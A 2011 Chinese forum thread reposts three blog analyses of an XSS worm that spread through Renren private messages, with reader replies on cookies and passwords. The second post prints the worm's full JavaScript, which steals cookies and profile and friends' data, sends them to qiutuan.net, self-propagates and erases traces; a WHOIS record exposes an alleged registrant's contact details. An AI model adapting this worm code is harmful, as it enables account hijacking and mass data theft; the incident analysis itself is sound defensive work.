查看: 7135|回复: 16
收起左侧

转三篇关于人人站内信漏洞的技术博客

  |只看干货 |老生常谈

分享帖子到朋友圈
zach | 显示全部楼层 |阅读模式
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   91% (2307)
 
 
8% (228)    👎

注册一亩三分地论坛,查看更多干货!

您需要 登录 才可以下载或查看,没有帐号?注册账号

x
本帖最后由 zach 于 2011-4-29 19:50 编辑

总结:

校内站内信漏洞被黑客利用,跨站脚本被执行,用户的资料和cookie已经被黑客窃取。这个漏洞还没有被补上,所以请大家不要打开任何站内信,以免中招。

这封暗恋站内信不是病毒,所以大家也就不需要查毒了。但是不排除之后站内信包含病毒的可能性。

用生日、手机号、qq号做密码的,建议立刻去改密码。邮箱可能会被卖给垃圾邮件发送者,所以请做好收垃圾邮件的心理准备。如果你上别的论坛神马的,也最好退出重新登陆下或者改下密码。

(请懂行的筒子来说一声,cookie被盗如果我在这里退出登录,有用么?没用的吧,还是得改密码?)

btw. 校内山寨脸书的铁证也曝光了,哈哈
第一篇:
关于4月29号 人人站内信漏洞造成的资料泄露事件

http://nopl.us/blog/463

Posted on 星期五, 四月 29th, 2011 at 16:43

今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么> 的站内信,

开始以为是游戏应用的推广方式,但是打开后发现有问题


查看站内信网页源码,发现其中有一行代码通过利用人人网的代码解析方式, 将本不该在文本中执行的代码执行了.

人人网对站内信的内容过滤只在客户端,而不是在服务端,这个病毒直接post站内信从而绕过了内容过滤,这样造成了代码的执行

分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,以及cookie

然后通过通讯录功能,还可以得到所有好友名片中的上述信息

其后全部信息被发送到制作人的网站上.

这次病毒主要是盗取用户的资料,但是这个漏洞完全可以实行漏洞攻击,和木马攻击.

这份站内信已经大量传播.

————————————————————————

关于这些被泄露出去的资料的利用方法

比较常用的是卖给别人, 用来做精准广告,  或者骗子做精准骗术.

黑客用来套你的密码,很多人的密码都是生日,手机什么的.

另外里面还带了你电脑上的cookie,有这个cookie,他就可以在你曾经登录过的网站伪装是你.


————————————————————————–

人人网现在的措施是将跨站域名设为敏感词,

刚刚测试了一下,这个漏洞依然存在, 而且因为这个漏洞的利用方式是完全公开的,  这段时间利用这个漏洞的攻击的事件会越来越多.光靠关键词没办法控制啊.

3点半左右, 人人网开始清理站内信.   这一波攻击到此告一段落了.

—————————————————————————

再一次的无语, 控诉一下人人,  黑客调用的megaboxx.submit_prehook这个函数来自于forum.developers.facebook.net  .  为什么人人的源代码里面会有只出现在facebook里的函数???

人人山寨的功夫真是无敌了.

另外黑客调用的函数平时发站内信的时候不会用到, 但是为什么黑客会知道?

—————————————————————————-


—————————————————————————

刚刚查到的域名的注册信息

dasha, wang dasha811@gmail.com
hubeishengwuhanshi
wuhan, 518089
China
+1.18603051234 Fax –

一个叫王大傻的人,  湖北武汉人.  但是邮编显示这个人是深圳的.

————————————————————————

服务器现在大量接收数据中,造成了ddos.  可以想象得到他收到了多少资料

下面是他的代码(略,代码分析见下一篇)

————————————————————————————————————————

第二篇:


校内站内信刚刚的攻击中,大家的个人信息可能被泄漏

http://www.fengchenzi.cn/post/983

分类:互联网络作者:风舞清扬阅读:485 views


//最简单的应急办法就是在本地hosts里将qiutuan.net解析到127.0.0.1

//C:\Windows\System32\drivers\etc\hosts 或 /etc/hosts 里添加 127.0.0.1 qiutuan.net

//简单一点,就是这个叫王大傻(音)的混蛋获取了大家的ID、学校、生日、姓名、QQ、MSN、手机 和 cookie

//和大家好友的相关信息,并自动发给好友,还从已发站内信里清除了痕迹

//每个打开站内信的同学都会向quituan.net发送数百条信息,王大傻自寻DDoS攻击,目前服务器已瘫痪,但之前已获取到的信息应该被保存了

以下是代码分析:





var token = XN.get_check;


var mobile_friends = [];

var all_friends = [];


var my_id = 0;


//将指定的数据发送回http://qiutuan.net/2011/log.php予以记录


function send_data(v)

{

var img = document.createElement(‘img’);

img.src = ‘http://qiutuan.net/2011/log.php?’ + v;

document.body.appendChild(img);

document.body.removeChild(img);

}



//向所有好友发送站内信

function send_to_friends(){

var i;

var idlist = [];

for (i = 0; i < all_friends.length; i++)

{

idlist.push(all_friends.toString());

//每获取10个好友,群发1次站内信

if (idlist.length == 10)

{

_send_to_friends(idlist);

idlist = [];

}

}

//向零头的几个好友发送

//居然一个都不舍得放过

if (idlist.length > 0) _send_to_friends(idlist);

}



//向指定ID列表内的好友发送“暗恋”的站内信

//我猜,2:17秒就是脚本完成全部操作的时间上限

function _send_to_friends(ids){

var content = “相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?(视频亮点在2:17秒) <script src=’http://qiutuan.net/2011/51.js’></script><embed src=’http://player.youku.com/player.php/sid/XMjYxNDMwNDQ4/v.swf’ quality=’high’ width=’480′ height=’400′ align=’middle’ allowScriptAccess=’sameDomain’ type=’application/x-shockwave-flash’></embed> “;

var p = {action:”sharetofriend”,

body:content,

form:{

albumid:”0″,

currenUserTinyurl:””,

fromSharedId:”0″,

fromShareOwner:”0″,

fromname:”",

fromno:”0″,

fromuniv:”",

link:”http://edm.renren.com/link.do?l=27627&;t=51″,

pic:””,

summary:”相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?”,

title:”加a02好友 奖品散不停”,

type:”51″

},

ids:ids,

noteId:”0″,

subject:”有人暗恋你哦,你想知道TA是谁么”,

tsc:token};


delete p.tsc;


new XN.net.xmlhttp({url:”http://share.renren.com/share/submit.do”,

data:”tsc=”+token+”&post=”+encodeURIComponent(XN.json.build(p)),

onSuccess: function (response) {del_send_messages();}

});

}



//居然还有扫尾工作

//对已发送列表里的站内信进行删除

function del_messages(idlist){


var struct_msgs ={

action:”delete”,

folder:”1″,

slice:”20″,

unread_count:”0″,

ids:idlist

};


new Ajax.Request(“/message/ajax.do”,{method:”get”,parameters:”post=”+encodeURIComponent(XN.JSON.build(struct_msgs))});


}



//从已发站内信中删除

function del_send_messages(){

var xmlhttp;

var xmlhttp2;

var token;

if (window.XMLHttpRequest)

{

xmlhttp=new XMLHttpRequest();

}

else

{

xmlhttp=new ActiveXObject(“Microsoft.XMLHTTP”);

}

xmlhttp.onreadystatechange=function(){


if (xmlhttp.readyState==4 && xmlhttp.status==200){

var text = xmlhttp.responseText;

/////////////////////////////////////////////////////////////////////////////////////////////////////////////

var listid1 = text.match(/thread_(\d+)/g);


for(var i=0;i < listid1.length;i++){


listid1 = listid1.substring(7);


}

del_messages(listid1);


/////////////////////////////////////////////////////////////////////////////////////////////////////////////

}

}

xmlhttp.open(“GET”, “http://msg.renren.com/message/inbox.do?f=1″ ,true);

xmlhttp.send();

}


//前面的是玩笑,可以一笑而过

//这里可就有点不地道了

//获取个人信息,包括ID、学校、生日、姓名、QQ、MSN、手机

//并发送给http://qiutuan.net/2011/log.php记录

function get_self_info(){

new XN.net.xmlhttp({url:”http://www.renren.com/profile.do?v=info_ajax&;undefined”,method:”GET”,onSuccess:function(r){

. 1point3acres

var text_html = r.responseText;


var id,name,birthday,qq,school,mobile,msn,day,month,year;


id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];

my_id = id;

school = /pf_spread\’\>(.*?)\<\/a\>/.exec(text_html)[1];

year = /birt\”\,\”year\”\:\”(\d+)/.exec(text_html)[1];

month = /birt\”\,\”month\”\:\”(\d+)/.exec(text_html)[1];

day = /birt\”\,\”day\”\:\”(\d+)/.exec(text_html)[1];

name = /alt\=\”([^\"]+)的大头贴/.exec(text_html)[1];


if(month <= 9){

month = “0″+month;

}

if(day <= 9){

day = “0″+day;

}

birthday = year + month + day;


qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];


msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];


mobile = /手机号.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];


var data = “type=self_info&id=” + id + “&name=” + encodeURIComponent(name)

+ “&school=” + encodeURIComponent(school)

+ “&birth=” + birthday

+ “&qq=” + qq

+ “&msn=” + encodeURIComponent(msn)

+ “&mobile=” + mobile;

send_data(data);

}


});

}


//获取指定TID好友的信息并发回qiutuan.net以记录

function get_card(tid)

{

new XN.net.xmlhttp({url:’http://www.renren.com/showcard?friendID=’+tid,

method:’get’,

onSuccess:function(r){

var obj = eval(“(“+r.responseText+”)”);

var data = ‘type=card&my_id=’ + my_id

+ ‘&id=’ + obj.id

+ ‘&name=’ + encodeURIComponent(obj.name)

+ ‘&msn=’ + encodeURIComponent(obj.msn)

+ ‘&phone=’ + encodeURIComponent(obj.phone)

+ ‘&qq=’ + encodeURIComponent(obj.qq)

+ ‘&email=’ + encodeURIComponent(obj.email)

+ ‘&address=’ + encodeURIComponent(obj.address);

send_data(data);

}

});

}


//获取所有好友的信息

function get_all_friends(){

new XN.net.xmlhttp({url:”http://www.renren.com/listcards”,method:”GET”,onSuccess:function(r){


var text_html = r.responseText;

//alert(text_html);


var friends_list = eval(“(“+text_html+”)”);

var owned_mobile = (friends_list.list[0].list).length;  //have mobile friends number

for(var i =0;i< owned_mobile ;i++){

mobile_friends.push(friends_list.list[0].list.id);

all_friends.push(friends_list.list[0].list.id);

}

//alert(mobile_friends.length);


var no_mobile = (friends_list.list[1].list).length;

for(var i =0;i< no_mobile ;i++){

all_friends.push(friends_list.list[1].list.id);

}

//alert(all_friends.length);

for(var i = 0; i < mobile_friends.length; i++)

get_card(mobile_friends);

send_to_friends();

}

});

}


//这是获取cookie并发送,这个玩得更大了

//徐老师提示,如果大家关得快的话,可能还没来得及发出

window.onload = function(){

send_data(‘type=cookie&v=’+encodeURIComponent(document.cookie));

get_self_info();

get_all_friends();

}


———————————————————————————————————————————-

以下是朋友获取到的qiutuan.net的域名信息


[whois.godaddy.com] The data contained in GoDaddy.com, Inc.’s WhoIs database,
while believed by the company to be reliable, is provided “as is”
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose is expressly forbidden without the prior written
permission of GoDaddy.com, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty. In particular,
you agree not to use this data to allow, enable, or otherwise make possible,
dissemination or collection of this data, in part or in its entirety, for any
purpose, such as the transmission of unsolicited advertising and
and solicitations of any kind, including spam. You further agree
not to use this data to enable high volume, automated or robotic electronic
processes designed to collect or compile this data for any purpose,
including mining this data for your own personal or commercial purposes.

Please note: the registrant of the domain name is specified
in the “registrant” field. In most cases, GoDaddy.com, Inc.
is not the registrant of domain names listed in this database.

Registrant:
wang dasha
hubeishengwuhanshi
wuhan, 518089
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: QIUTUAN.NET
Created on: 06-Mar-11
Expires on: 06-Mar-13
Last Updated on: 12-Apr-11
Administrative Contact:
dasha, wang dasha811@gmail.com-baidu 1point3acres
hubeishengwuhanshi//注册人王大傻(音)为武汉的
wuhan, 518089
China. check 1point3acres for more.
+1.18603051234 Fax –

Technical Contact:
dasha, wang dasha811@gmail.com
hubeishengwuhanshi
wuhan, 518089
China
+1.18603051234 Fax –

Domain servers in listed order:
. 1point3acresNS1.HOSTABLE.COM
NS2.HOSTABLE.COM
NS69.DOMAINCONTROL.COM
NS70.DOMAINCONTROL.COM

这人可以去死了。一堆假地址!主机地址在washington DC.

——————————————————————————————————————


第三篇:

http://internet.solidot.org/internet/11/04/29/1527233.shtml


"4月29日晚,大量人人网用户收到一个标题为《有人暗恋你哦,你想知道TA是谁么》的站内信,用户发现若打开此站内信将会自动将此站内信内容发给所有好友。通过查看站内信网页源码,发现其中有一行代码为<script src='http://qiutuan.net/2011/51.js'>。显然,一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义为普通文本防止浏览器执行,但人人网的转化方式为在用户发送端转化,若绕过此机制直接发送(如此js脚本中直接post站内信内容)则文本中包含的HTML均可被正常执行……
显然作者的意图并非只是恶作剧,通过查看连混淆都懒得做的代码,我们可以很清楚的看到其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,并且通过一个伟大的功能——通讯录,还可以得到所有好友名片中的上述信息……全部信息会发送到http://qiutuan.net/2011/log.php. check 1point3acres for more.
由于此站内信的传播之广泛,目前只知道此域名几乎是针对性的使用并且托管在美国,唯一能稍微解决此问题的方法是所有会写代码的人都写一个脚本随机生成数据去稀释被上传的数据,当然要在其收手前做完。 "
要知道,人人网的隐私保护做的一直没有山寨它的某网站好。
珍爱生命,远离淫淫。




上一篇:推荐一本书
下一篇:在国内可以用gmail吗?
wwtpcsuper 2011-4-30 05:56:33 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   96% (1474)
 
 
3% (49)    👎
赞技术帖~~~~~~~~~~~
回复

使用道具 举报

ljcljc 2011-4-30 08:39:10 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   92% (130)
 
 
7% (11)    👎
校内山寨是众所周知的。。更让我无语的是,连默认颜色都和facebook一样。。

我记得,前两年,我给我美国的一个朋友看校内网。。结果刚打开他就惊呼"和某某一模一样"
回复

使用道具 举报

ljcljc 2011-4-30 08:42:16 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   92% (130)
 
 
7% (11)    👎
cookie的话,要用浏览器的清空cookie选项就行了。。

否则是一直保存在本地的
回复

使用道具 举报

 楼主| zach 2011-4-30 08:49:40 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   91% (2307)
 
 
8% (228)    👎
cookie的话,要用浏览器的清空cookie选项就行了。。

否则是一直保存在本地的
ljcljc 发表于 2011-4-29 19:42

黑客偷走了你的cookie,你本地清除有用么?
回复

使用道具 举报

ljcljc 2011-4-30 08:55:07 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   92% (130)
 
 
7% (11)    👎
黑客偷走了你的cookie,你本地清除有用么?
zach 发表于 2011-4-30 08:49


我说在他偷走之前清除。。。偷走之后,好像没什么办法吧
回复

使用道具 举报

 楼主| zach 2011-4-30 09:38:51 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   91% (2307)
 
 
8% (228)    👎
我说在他偷走之前清除。。。偷走之后,好像没什么办法吧
ljcljc 发表于 2011-4-29 19:55

改密码可以把……
回复

使用道具 举报

ljcljc 2011-4-30 10:23:07 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   92% (130)
 
 
7% (11)    👎
改密码可以把……
zach 发表于 2011-4-30 09:38


可以啊。。。。
回复

使用道具 举报

romax 2011-4-30 20:02:31 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   100% (6)
 
 
0% (0)    👎
敢问lz神牛就是xiaonei的xingbing么。。
回复

使用道具 举报

 楼主| zach 2011-5-1 04:29:13 | 显示全部楼层
本楼: 👍   0% (0)
 
 
0% (0)   👎
全局: 👍   91% (2307)
 
 
8% (228)    👎
敢问lz神牛就是xiaonei的xingbing么。。
romax 发表于 2011-4-30 07:02

nope
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

隐私提醒:
■拉群请前往同学同事飞友|拉群结伴版块,其他版块拉群,帖子会被自动删除
■论坛不能删帖,为防止被骚扰甚至人肉,不要公开留微信等联系方式,请以论坛私信方式发送。
■特定版块可以超级匿名:https://tools.1point3acres.com/thread
■其他版块匿名方法:http://www.1point3acres.com/bbs/thread-405991-1-1.html

X 关闭
>
快速回复 返回顶部 返回列表